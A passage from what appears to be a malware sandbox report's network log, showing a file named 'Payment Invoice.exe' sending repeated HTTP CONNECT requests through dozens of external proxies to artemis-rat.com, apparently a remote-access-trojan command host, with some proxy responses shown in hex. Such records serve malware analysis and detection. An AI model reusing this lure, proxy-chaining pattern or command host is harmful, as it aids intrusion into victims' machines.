                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.776941061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.776745081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.901818991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1366192.168.2.45410159.6.26.121807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.576630116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1367192.168.2.454116196.20.125.14580837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.592247963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1368192.168.2.453263103.179.139.17080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.592336893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.620748043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.714574099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.714477062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.823575974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.823581934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.823967934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.825964928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.823803902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1369192.168.2.453272162.55.87.4855667076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.594037056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.902350903 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1370192.168.2.453288109.199.109.14431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.594144106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589534998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589941025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.589488029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1371192.168.2.45413361.79.73.225807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.596355915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1372192.168.2.454138104.16.107.206807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.599989891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.754323959 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1373192.168.2.45236951.38.63.124272947076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.600311041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589520931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589940071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.589485884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.676260948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.776765108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:08.776946068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:32.779470921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:20.902108908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1374192.168.2.453340198.49.68.80807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.603035927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.589571953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.589941025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.589488029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.279251099 CET536INHTTP/1.1 500 Internal Server Error
                                                                Date: Mon, 11 Mar 2024 15:15:41 GMT
                                                                Server: Apache
                                                                Content-Length: 663
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 64 66 67 68 68 73 64 66 67 68 40 61 73 64 66 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at dfghhsdfgh@asdf.com to inform them of the time this e
                                                                Mar 11, 2024 16:15:41.279293060 CET303INData Raw: 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20
                                                                Data Ascii: rror occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><p>Additionally, a 500 Internal Server Errorerror was encountered while trying to use


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1375192.168.2.454109177.67.136.24141537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.603627920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1376192.168.2.45414324.144.95.21880007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.617600918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.834728003 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1377192.168.2.45250488.202.230.103136387076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.620579958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.620779991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.714584112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.714487076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.823641062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1378192.168.2.453316109.238.12.15613657076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.625406027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.620815039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1379192.168.2.45414835.190.107.16300007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.631233931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1380192.168.2.454144162.243.55.12509417076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.692625046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.241775036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.980175018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.379070997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.183303118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.978621006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.731827974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.089603901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.886164904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1381192.168.2.454104103.190.54.141807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.693114996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
